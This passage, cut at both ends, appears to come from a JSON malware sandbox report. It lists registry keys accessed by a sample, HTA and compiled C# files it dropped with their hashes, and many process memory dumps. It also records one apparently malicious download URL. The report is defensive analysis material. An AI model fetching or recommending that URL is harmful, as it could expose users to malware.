"registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell\\1", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\Environment", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Environment", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\HardwareEvents\\PowerShell", "type": "registry_artifact", "version": 1 }, { 
"operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Internet Explorer\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Key Management Service\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Media Center\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\OAlerts\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\System\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Windows PowerShell\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0", "type": 
"registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Word", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Word\\Resiliency", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Word\\Resiliency", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\14.0\\Word\\Resiliency\\StartupItems", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\14.0", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\14.0\\Word", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\14.0\\Word\\Resiliency\\StartupItems", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\14.0\\Word\\Resiliency", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\14.0\\Word\\Resiliency", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Word\\Resiliency\\StartupItems", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": 
"HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Word", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [ { "operations": "GET", "type": "url_artifact", "url": "www.samyrai777m.p-host.in/t/tp.php?thread=0", "version": 1 } ], "version": 1 }, "extracted_files": [ { "archive_path": "extracted_files/48233228f9babdd3bcac5b85d5ae258f91204f7e", "file_type": "created_file", "id": "file_2", "md5_hash": "667a8968a36880dc4147d2ce00c64b30", "norm_filename": "c:\\users\\aetadzjz\\desktop\\logo.cs", "sha1_hash": "48233228f9babdd3bcac5b85d5ae258f91204f7e", "sha256_hash": "8aea15951d21f30f44a8d7499472b62473203959659eeb2b9059b64698deacfd", "size": 1098, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_3", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\91rxrejg.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_7", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\91rxrejg.err", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", 
"file_type": "created_file", "id": "file_10", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\result.exex", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/6ba244d7eb6a6facd2b4c4e946e26987d2336e8b", "file_type": "created_file", "id": "file_4", "md5_hash": "3992ea6c0751d769815a98c4cffcadce", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\91rxrejg.0.cs", "sha1_hash": "6ba244d7eb6a6facd2b4c4e946e26987d2336e8b", "sha256_hash": "b12a34c289c97db64f4267e5c67b70f4fefedfe28ae6527e7721a6ef3e4e0adc", "size": 1101, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/2024365b4311bc93867119ceee7c876683fef607", "file_type": "created_file", "id": "file_5", "md5_hash": "8d42a6a6ddda3cb8546ef4cb888dbfa8", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\91rxrejg.cmdline", "sha1_hash": "2024365b4311bc93867119ceee7c876683fef607", "sha256_hash": "f0d80af454b0e9060f13236c0827a4df63d61ac4964a174c999f4aa2895ff00e", "size": 288, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/f1fae130030df5b4dff15ed820ca35665886ea98", "file_type": "created_file", "id": "file_6", "md5_hash": "51bfb6f473aa25324ee1ed9830ca806e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\91rxrejg.out", "sha1_hash": "f1fae130030df5b4dff15ed820ca35665886ea98", "sha256_hash": "60a57285c3ccbfa3f03f050681e54c27de4ef1766fe6151104a919b7f7c8fa2e", "size": 379, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/1284d7400f30f5a2c409f3f53fcf34b30c32268d", "file_type": "modified_file", "id": "file_8", "md5_hash": "13b131d98fea2526196b20496ec68b0a", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\x9ohk109\\t[1].hta", 
"sha1_hash": "1284d7400f30f5a2c409f3f53fcf34b30c32268d", "sha256_hash": "ae09b5dc38c85387a861cb4aee8b08ef6c7b216f21ba1bd06c9d1b3adab46a75", "size": 3313, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/1284d7400f30f5a2c409f3f53fcf34b30c32268d", "file_type": "modified_file", "id": "file_9", "md5_hash": "13b131d98fea2526196b20496ec68b0a", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\x9ohk109\\t[2].hta", "sha1_hash": "1284d7400f30f5a2c409f3f53fcf34b30c32268d", "sha256_hash": "ae09b5dc38c85387a861cb4aee8b08ef6c7b216f21ba1bd06c9d1b3adab46a75", "size": 3313, "type": "extracted_file", "version": 1 } ], "process_dumps": [ { "archive_path": "process_dumps/process_00000001-region_00000397-addr_0x00000000099b0000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000001-region_00000397-addr_0x00000000099b0000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_11", "md5_hash": "289d69570ded5db52247f822dda8235e", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "e4693ea274d51afab8b162d35ca98eb1ee68c393", "sha256_hash": "dd5f6c123a9efafef1c47d2ae863349dd0c97f966b9e3e34570031910ba0b5a7", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000402-addr_0x000007fffff78000-size_0x0000000000002000-perm_rw.bin", "filename": "process_00000001-region_00000402-addr_0x000007fffff78000-size_0x0000000000002000-perm_rw.bin", "id": "proc_dump_12", "md5_hash": "246bec9ff45068c2fea0d6ed31491b5d", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "49ebd5510184d6cda8e0c36795825450a88311ad", "sha256_hash": "667e40b334a3553e99c060a8b86fa600998cfea0e8f2297f8c8e5984d606c2f3", "size": 8192, "type": "process_dump", "version": 1 }, { "archive_path": 
"process_dumps/process_00000001-region_00000403-addr_0x000007fffff7a000-size_0x0000000000002000-perm_rw.bin", "filename": "process_00000001-region_00000403-addr_0x000007fffff7a000-size_0x0000000000002000-perm_rw.bin", "id": "proc_dump_13", "md5_hash": "7c1b5d816f3217cc841de2470ecb0ab7", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "9fd92c2e4799a01f26eeb96d3656f42608a71ff9", "sha256_hash": "9c0134961353ab0c873cb4755b63d934971c913df3bd6505152d4deb7ddda1bd", "size": 8192, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000404-addr_0x0000000002a10000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000404-addr_0x0000000002a10000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_14", "md5_hash": "0b9f986f0e366bca57d501f16d649aa8", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "39298947eadd8cab3faeb7608aeebb781b93d198", "sha256_hash": "48699533ba2ceab840a0920d569e177914b63c4c2654f00c2a44eed6f72762fe", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000405-addr_0x0000000002a20000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000405-addr_0x0000000002a20000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_15", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000406-addr_0x0000000002a30000-size_0x0000000000001000-perm_rw.bin", "filename": 
"process_00000001-region_00000406-addr_0x0000000002a30000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_16", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000407-addr_0x0000000002c70000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000407-addr_0x0000000002c70000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_17", "md5_hash": "43b6d61759568e4ac3d4d2a847bcdf5d", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "1241696cf105ee3ff6bb9e86ade44ea517297ee3", "sha256_hash": "e6677d53f7e55e3abeffbb77034cab21cdad20935012ca6627efa00916af651d", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000408-addr_0x0000000002e80000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000001-region_00000408-addr_0x0000000002e80000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_18", "md5_hash": "bb02ae3f1fb268719dafaa2991c3850e", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "c1d9a14a02f721ccfaf18a68e0e0d27b5b151248", "sha256_hash": "b91021be6c0d09aa98df1596727f8b89c4fd8cbacdcb4898daf75348e56fd968", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000409-addr_0x0000000002f80000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000409-addr_0x0000000002f80000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_19", "md5_hash": 
"e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000410-addr_0x0000000002f90000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000410-addr_0x0000000002f90000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_20", "md5_hash": "4e8e78b12c5b1705aef682ca8f30c495", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "1c5f6571a31dbe3c12d1f62a049347e50271c27c", "sha256_hash": "15ac0c91d8a82e95f254f561a0d8f32cf33e6429c5150070a3f6832141fab37e", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000411-addr_0x0000000002fa0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000411-addr_0x0000000002fa0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_21", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000412-addr_0x0000000002fb0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000412-addr_0x0000000002fb0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_22", "md5_hash": "b316bbc266dad34fabc1aa5587300bd9", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": 
"reference", "version": 1 }, "sha1_hash": "5ff8e293ad2c7d36ee2ca6b03ddf333376a119d7", "sha256_hash": "240776fee73e7978e2ca459b3af2473078bfb8d18f60d571e310055f84581010", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000413-addr_0x0000000004790000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000413-addr_0x0000000004790000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_23", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000414-addr_0x00000000049a0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000414-addr_0x00000000049a0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_24", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000415-addr_0x0000000004c90000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000415-addr_0x0000000004c90000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_25", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": 
"88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000416-addr_0x0000000004ca0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000416-addr_0x0000000004ca0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_26", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000417-addr_0x0000000004cb0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000417-addr_0x0000000004cb0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_27", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000418-addr_0x0000000004cc0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000418-addr_0x0000000004cc0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_28", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { 
"archive_path": "process_dumps/process_00000001-region_00000419-addr_0x0000000004dd0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000419-addr_0x0000000004dd0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_29", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000420-addr_0x0000000004de0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000420-addr_0x0000000004de0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_30", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000421-addr_0x0000000004df0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000421-addr_0x0000000004df0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_31", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000422-addr_0x0000000005680000-size_0x0000000000001000-perm_rw.bin", 
"filename": "process_00000001-region_00000422-addr_0x0000000005680000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_32", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000423-addr_0x0000000005690000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000423-addr_0x0000000005690000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_33", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000424-addr_0x00000000056a0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000424-addr_0x00000000056a0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_34", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000425-addr_0x00000000056b0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000425-addr_0x00000000056b0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_35", 
"md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000426-addr_0x00000000056c0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000426-addr_0x00000000056c0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_36", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000427-addr_0x00000000056d0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000427-addr_0x00000000056d0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_37", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000428-addr_0x00000000058e0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000428-addr_0x00000000058e0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_38", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", 
"type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000429-addr_0x00000000058f0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000429-addr_0x00000000058f0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_39", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000430-addr_0x0000000005900000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000430-addr_0x0000000005900000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_40", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": 